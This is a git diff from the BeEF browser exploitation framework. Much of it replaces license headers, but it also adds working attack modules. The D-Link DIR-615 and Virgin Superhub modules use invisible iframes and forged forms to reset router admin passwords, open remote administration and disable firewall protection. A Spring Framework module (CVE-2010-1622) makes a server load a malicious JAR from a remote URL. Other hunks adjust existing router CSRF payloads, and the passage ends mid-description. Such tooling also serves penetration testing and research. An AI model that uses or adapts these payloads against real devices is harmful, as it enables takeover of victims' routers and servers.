2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Comtrend_ct5367_csrf < BeEF::Core::Command diff --git a/modules/exploits/router/comtrend_ct5624_csrf/command.js b/modules/exploits/router/comtrend_ct5624_csrf/command.js index b6cc7ab28..4dbe00969 100644 --- a/modules/exploits/router/comtrend_ct5624_csrf/command.js +++ b/modules/exploits/router/comtrend_ct5624_csrf/command.js @@ -1,24 +1,15 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var gateway = '<%= @base %>'; var passwd = '<%= @password %>'; var ct5367_iframe1 = beef.dom.createInvisibleIframe(); - ct5367_iframe1.setAttribute('src', gateway+'/scsrvcntr.cmd?action=save&ftp=1&ftp=3&http=1&http=3&icmp=1&snmp=1&snmp=3&ssh=1&ssh=3&telnet=1&telnet=3&tftp=1&tftp=3'); + ct5367_iframe1.setAttribute('src', gateway+'scsrvcntr.cmd?action=save&ftp=1&ftp=3&http=1&http=3&icmp=1&snmp=1&snmp=3&ssh=1&ssh=3&telnet=1&telnet=3&tftp=1&tftp=3'); var ct5367_iframe2 = beef.dom.createInvisibleIframe(); ct5367_iframe2.setAttribute('src', gateway+'/password.cgi?usrPassword='+passwd+'&sysPassword='+passwd+'&sptPassword='+passwd); diff --git a/modules/exploits/router/comtrend_ct5624_csrf/config.yaml b/modules/exploits/router/comtrend_ct5624_csrf/config.yaml index 27f47c06e..192703c9b 100644 --- a/modules/exploits/router/comtrend_ct5624_csrf/config.yaml +++ b/modules/exploits/router/comtrend_ct5624_csrf/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/exploits/router/comtrend_ct5624_csrf/module.rb b/modules/exploits/router/comtrend_ct5624_csrf/module.rb index 84948985e..b22a1c9e9 100644 --- a/modules/exploits/router/comtrend_ct5624_csrf/module.rb +++ b/modules/exploits/router/comtrend_ct5624_csrf/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Comtrend_ct5624_csrf < BeEF::Core::Command diff --git a/modules/exploits/router/dlink_dir_615_csrf/command.js b/modules/exploits/router/dlink_dir_615_csrf/command.js new file mode 100644 index 000000000..ac96420c6 --- /dev/null +++ b/modules/exploits/router/dlink_dir_615_csrf/command.js @@ -0,0 +1,31 @@ +// +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +beef.execute(function() { + var gateway = '<%= @base %>'; + var passwd = '<%= @password %>'; + + var dir615_iframe = beef.dom.createIframeXsrfForm(gateway + "tools_admin.php", "POST", + [{'type':'hidden', 'name':'ACTION_POST', 'value':'1'} , + {'type':'hidden', 'name':'apply', 'value':'Save Settings'}, + {'type':'hidden', 'name':'admin_name', 'value':'admin'}, + {'type':'hidden', 'name':'admin_password1', 'value':passwd}, + {'type':'hidden', 'name':'admin_password2', 'value':passwd}, + {'type':'hidden', 'name':'rt_enable', 'value':'on'}, + {'type':'hidden', 'name':'rt_enable_h', 'value':'1'}, + {'type':'hidden', 'name':'rt_ipaddr', 'value':'0.0.0.0'}, + {'type':'hidden', 'name':'rt_port', 'value':'8080'} + ]); + + beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); + + cleanup = function() { + document.body.removeChild(dir615_iframe); + } + setTimeout("cleanup()", 15000); + +}); + diff --git a/modules/exploits/router/dlink_dir_615_csrf/config.yaml b/modules/exploits/router/dlink_dir_615_csrf/config.yaml new file mode 100644 index 000000000..d2ba3fabf --- /dev/null +++ b/modules/exploits/router/dlink_dir_615_csrf/config.yaml @@ -0,0 +1,15 @@ +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +beef: + module: + dlink_dir_615_csrf: + enable: true + category: ["Exploits", "Router"] + name: "D-Link DIR-615 Password Wipe" + description: "Attempts to enable remote administration on port 8080 and change the admin password on a D-Link DIR-615 router." + authors: ["antisnatchor", "n0x00"] + target: + working: ["ALL"] diff --git a/modules/exploits/router/dlink_dir_615_csrf/module.rb b/modules/exploits/router/dlink_dir_615_csrf/module.rb new file mode 100644 index 000000000..1c2d4313a --- /dev/null +++ b/modules/exploits/router/dlink_dir_615_csrf/module.rb @@ -0,0 +1,19 @@ +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +class Dlink_dir_615_csrf < BeEF::Core::Command + + def self.options + return [ + {'name' => 'base', 'ui_label' => 'Router web root', 'value' => 'http://192.168.0.1/'}, + {'name' => 'password', 'ui_label' => 'Desired password', 'value' => '__BeEF__'} + ] + end + + def post_execute + save({'result' => @datastore['result']}) + end + +end diff --git a/modules/exploits/router/dlink_dsl500t_csrf/command.js b/modules/exploits/router/dlink_dsl500t_csrf/command.js index ae1c98e23..20b7eca63 100644 --- a/modules/exploits/router/dlink_dsl500t_csrf/command.js +++ b/modules/exploits/router/dlink_dsl500t_csrf/command.js @@ -1,23 +1,14 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var gateway = '<%= @base %>'; var passwd = '<%= @password %>'; - var dsl500t_iframe = beef.dom.createIframeXsrfForm(gateway + "/cgi-bin/webcm", "POST", + var dsl500t_iframe = beef.dom.createIframeXsrfForm(gateway + "cgi-bin/webcm", "POST", [{'type':'hidden', 'name':'getpage', 'value':'../html/tools/usrmgmt.htm'} , {'type':'hidden', 'name':'security:settings/username', 'value':'admin'}, {'type':'hidden', 'name':'security:settings/password', 'value':passwd}, diff --git a/modules/exploits/router/dlink_dsl500t_csrf/config.yaml b/modules/exploits/router/dlink_dsl500t_csrf/config.yaml index d7e6ace24..735bc0357 100644 --- a/modules/exploits/router/dlink_dsl500t_csrf/config.yaml +++ b/modules/exploits/router/dlink_dsl500t_csrf/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/exploits/router/dlink_dsl500t_csrf/module.rb b/modules/exploits/router/dlink_dsl500t_csrf/module.rb index 804200959..18a0c65fe 100644 --- a/modules/exploits/router/dlink_dsl500t_csrf/module.rb +++ b/modules/exploits/router/dlink_dsl500t_csrf/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Dlink_dsl500t_csrf < BeEF::Core::Command diff --git a/modules/exploits/router/huawei_smartax_mt880/command.js b/modules/exploits/router/huawei_smartax_mt880/command.js index a749117a8..db42a848c 100644 --- a/modules/exploits/router/huawei_smartax_mt880/command.js +++ b/modules/exploits/router/huawei_smartax_mt880/command.js @@ -1,25 +1,16 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var gateway = '<%= @base %>'; var username = '<%= @username %>'; var passwd = '<%= @password %>'; var huawei_smartax_mt880_iframe = beef.dom.createInvisibleIframe(); - huawei_smartax_mt880_iframe.setAttribute('src', gateway+"/Action?user_id="+username+"&priv=1&pass1="+passwd+"&pass2="+passwd+"&id=70"); + huawei_smartax_mt880_iframe.setAttribute('src', gateway+"Action?user_id="+username+"&priv=1&pass1="+passwd+"&pass2="+passwd+"&id=70"); beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); diff --git a/modules/exploits/router/huawei_smartax_mt880/config.yaml b/modules/exploits/router/huawei_smartax_mt880/config.yaml index d12a65130..07ee01588 100644 --- a/modules/exploits/router/huawei_smartax_mt880/config.yaml +++ b/modules/exploits/router/huawei_smartax_mt880/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/exploits/router/huawei_smartax_mt880/module.rb b/modules/exploits/router/huawei_smartax_mt880/module.rb index 77f39ba20..1cda0dcc3 100644 --- a/modules/exploits/router/huawei_smartax_mt880/module.rb +++ b/modules/exploits/router/huawei_smartax_mt880/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Huawei_smartax_mt880_csrf < BeEF::Core::Command diff --git a/modules/exploits/router/linksys_befsr41_csrf/command.js b/modules/exploits/router/linksys_befsr41_csrf/command.js index cb7d19eb5..f09e89f23 100644 --- a/modules/exploits/router/linksys_befsr41_csrf/command.js +++ b/modules/exploits/router/linksys_befsr41_csrf/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var befsr41_iframe = beef.dom.createInvisibleIframe(); diff --git a/modules/exploits/router/linksys_befsr41_csrf/config.yaml b/modules/exploits/router/linksys_befsr41_csrf/config.yaml index d3308de95..663e1c058 100644 --- a/modules/exploits/router/linksys_befsr41_csrf/config.yaml +++ b/modules/exploits/router/linksys_befsr41_csrf/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/exploits/router/linksys_befsr41_csrf/module.rb b/modules/exploits/router/linksys_befsr41_csrf/module.rb index 40dcaa4dc..b2e0a6582 100644 --- a/modules/exploits/router/linksys_befsr41_csrf/module.rb +++ b/modules/exploits/router/linksys_befsr41_csrf/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Linksys_befsr41_csrf < BeEF::Core::Command diff --git a/modules/exploits/router/linksys_wrt54g2_csrf/command.js b/modules/exploits/router/linksys_wrt54g2_csrf/command.js index 0f362bf89..4f76fb710 100644 --- a/modules/exploits/router/linksys_wrt54g2_csrf/command.js +++ b/modules/exploits/router/linksys_wrt54g2_csrf/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var port = '<%= @port %>'; var gateway = '<%= @base %>'; diff --git a/modules/exploits/router/linksys_wrt54g2_csrf/config.yaml b/modules/exploits/router/linksys_wrt54g2_csrf/config.yaml index a64dd89fd..7d8439e5b 100644 --- a/modules/exploits/router/linksys_wrt54g2_csrf/config.yaml +++ b/modules/exploits/router/linksys_wrt54g2_csrf/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/exploits/router/linksys_wrt54g2_csrf/module.rb b/modules/exploits/router/linksys_wrt54g2_csrf/module.rb index 94f5d6ed0..adbce13ac 100644 --- a/modules/exploits/router/linksys_wrt54g2_csrf/module.rb +++ b/modules/exploits/router/linksys_wrt54g2_csrf/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Linksys_wrt54g2_csrf < BeEF::Core::Command diff --git a/modules/exploits/router/linksys_wrt54g_csrf/command.js b/modules/exploits/router/linksys_wrt54g_csrf/command.js index d18e65898..3959cb0ae 100644 --- a/modules/exploits/router/linksys_wrt54g_csrf/command.js +++ b/modules/exploits/router/linksys_wrt54g_csrf/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var port = '<%= @port %>'; var gateway = '<%= @base %>'; diff --git a/modules/exploits/router/linksys_wrt54g_csrf/config.yaml b/modules/exploits/router/linksys_wrt54g_csrf/config.yaml index 4129d26e1..fe4845565 100644 --- a/modules/exploits/router/linksys_wrt54g_csrf/config.yaml +++ b/modules/exploits/router/linksys_wrt54g_csrf/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/exploits/router/linksys_wrt54g_csrf/module.rb b/modules/exploits/router/linksys_wrt54g_csrf/module.rb index 47ee87039..4641c3a31 100644 --- a/modules/exploits/router/linksys_wrt54g_csrf/module.rb +++ b/modules/exploits/router/linksys_wrt54g_csrf/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Linksys_wrt54g_csrf < BeEF::Core::Command diff --git a/modules/exploits/router/virgin_superhub_csrf/command.js b/modules/exploits/router/virgin_superhub_csrf/command.js new file mode 100644 index 000000000..89ab00810 --- /dev/null +++ b/modules/exploits/router/virgin_superhub_csrf/command.js @@ -0,0 +1,38 @@ +// +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +beef.execute(function() { + + var gateway = '<%= @base %>'; + var passwd = '<%= @password %>'; + var port = '<%= @port %>'; + + var virgin_superhub_iframe1 = beef.dom.createIframeXsrfForm(gateway + "goform/RgSecurity", "POST", [ + {'type':'hidden', 'name':'NetgearPassword', 'value':passwd}, + {'type':'hidden', 'name':'NetgearPasswordReEnter', 'value':passwd}, + {'type':'hidden', 'name':'RestoreFactoryNo', 'value':'0x00'} + ]); + + var virgin_superhub_iframe2 = beef.dom.createIframeXsrfForm(gateway + "goform/RgServices", "POST", [ + {'type':'hidden', 'name':'cbPortScanDetection', 'value':''} + ]); + + var virgin_superhub_iframe3 = beef.dom.createIframeXsrfForm(gateway + "goform/RgVMRemoteManagementRes", "POST", [ + {'type':'hidden', 'name':'NetgearVMRmEnable', 'value':'0x01'}, + {'type':'hidden', 'name':'NetgearVMRmPortNumber', 'value':port} + ]); + + beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); + + cleanup = function() { + document.body.removeChild(virgin_superhub_iframe1); + document.body.removeChild(virgin_superhub_iframe2); + document.body.removeChild(virgin_superhub_iframe3); + } + setTimeout("cleanup()", 15000); + +}); + diff --git a/modules/exploits/router/virgin_superhub_csrf/config.yaml b/modules/exploits/router/virgin_superhub_csrf/config.yaml new file mode 100644 index 000000000..b4016b540 --- /dev/null +++ b/modules/exploits/router/virgin_superhub_csrf/config.yaml @@ -0,0 +1,15 @@ +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +beef: + module: + virgin_superhub_csrf: + enable: true + category: ["Exploits", "Router"] + name: "Virgin Superhub CSRF" + description: "Attempts to enable remote administration, disable the firewall, and change the admin password on a Virgin Superhub router." + authors: ["bcoles", "n0x00"] + target: + working: ["ALL"] diff --git a/modules/exploits/router/virgin_superhub_csrf/module.rb b/modules/exploits/router/virgin_superhub_csrf/module.rb new file mode 100644 index 000000000..c815843ac --- /dev/null +++ b/modules/exploits/router/virgin_superhub_csrf/module.rb @@ -0,0 +1,20 @@ +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +class Virgin_superhub_csrf < BeEF::Core::Command + + def self.options + return [ + {'name' => 'base', 'ui_label' => 'Router web root', 'value' => 'http://192.168.100.1/'}, + {'name' => 'password', 'ui_label' => 'Desired password', 'value' => '__BeEF__'}, + {'name' => 'port', 'ui_label' => 'Desired port', 'value' => '31337'} + ] + end + + def post_execute + save({'result' => @datastore['result']}) + end + +end diff --git a/modules/exploits/safari_launch_app/command.js b/modules/exploits/safari_launch_app/command.js deleted file mode 100755 index 91970c842..000000000 --- a/modules/exploits/safari_launch_app/command.js +++ /dev/null @@ -1,23 +0,0 @@ -// -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. -// -beef.execute(function() { - var baseTag = document.createElement('base'); - baseTag.setAttribute('id', 'sla_<%= @command_id %>'); - baseTag.setAttribute('href', 'file://'); - document.head.appendChild(baseTag); - setTimeout('document.location="<%= @app_path %>";beef.net.send("<%= @command_url %>", <%= @command_id %>, "Command [<%= @app_path %>] launched");', 1000); - setTimeout('document.head.removeChild(document.getElementById("sla_<%= @command_id %>"));beef.net.send("<%= @command_url %>", <%= @command_id %>, "Base tag removed");', 1000); -}); diff --git a/modules/exploits/safari_launch_app/module.rb b/modules/exploits/safari_launch_app/module.rb deleted file mode 100755 index 50eb85b4a..000000000 --- a/modules/exploits/safari_launch_app/module.rb +++ /dev/null @@ -1,24 +0,0 @@ -# -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. -# -class Safari_launch_app < BeEF::Core::Command - - def self.options - return [ - {'name'=>'app_path', 'ui_label' => 'Application', 'value' => '/usr/sbin/netstat'}, - ] - end - -end diff --git a/modules/exploits/spring_framework_malicious_jar/command.js b/modules/exploits/spring_framework_malicious_jar/command.js new file mode 100644 index 000000000..cf4e73799 --- /dev/null +++ b/modules/exploits/spring_framework_malicious_jar/command.js @@ -0,0 +1,23 @@ +// +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +beef.execute(function() { + + jar_file = "<%= @jar_file %>"; + form_controller = "<%= @form_controller %>"; + + uri = form_controller+"?class.classLoader.URLs[0]=jar:"+jar_file; + var spring_iframe = beef.dom.createInvisibleIframe(); + spring_iframe.setAttribute('src', uri); + + beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=exploit attempted"); + + cleanup = function() { + document.body.removeChild(spring_iframe); + } + setTimeout("cleanup()", 15000); + +}); diff --git a/modules/exploits/spring_framework_malicious_jar/config.yaml b/modules/exploits/spring_framework_malicious_jar/config.yaml new file mode 100644 index 000000000..c47fe917d --- /dev/null +++ b/modules/exploits/spring_framework_malicious_jar/config.yaml @@ -0,0 +1,15 @@ +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +beef: + module: + spring_framework_malicious_jar: + enable: true + category: "Exploits" + name: "Spring Framework Malicious Jar Exploit" + description: "Execute a malicious JAR file using the Spring Framework 'class.classloader' vulnerability (CVE-2010-1622).
Specify the URL for a form controller on the target and the URL for your malicious JAR file.
For more information see: http://www.exploit-db.com/exploits/13918/

Versions Affected:
3.0.0 to 3.0.2
2.5.0 to 2.5.6.SEC01 (community releases)
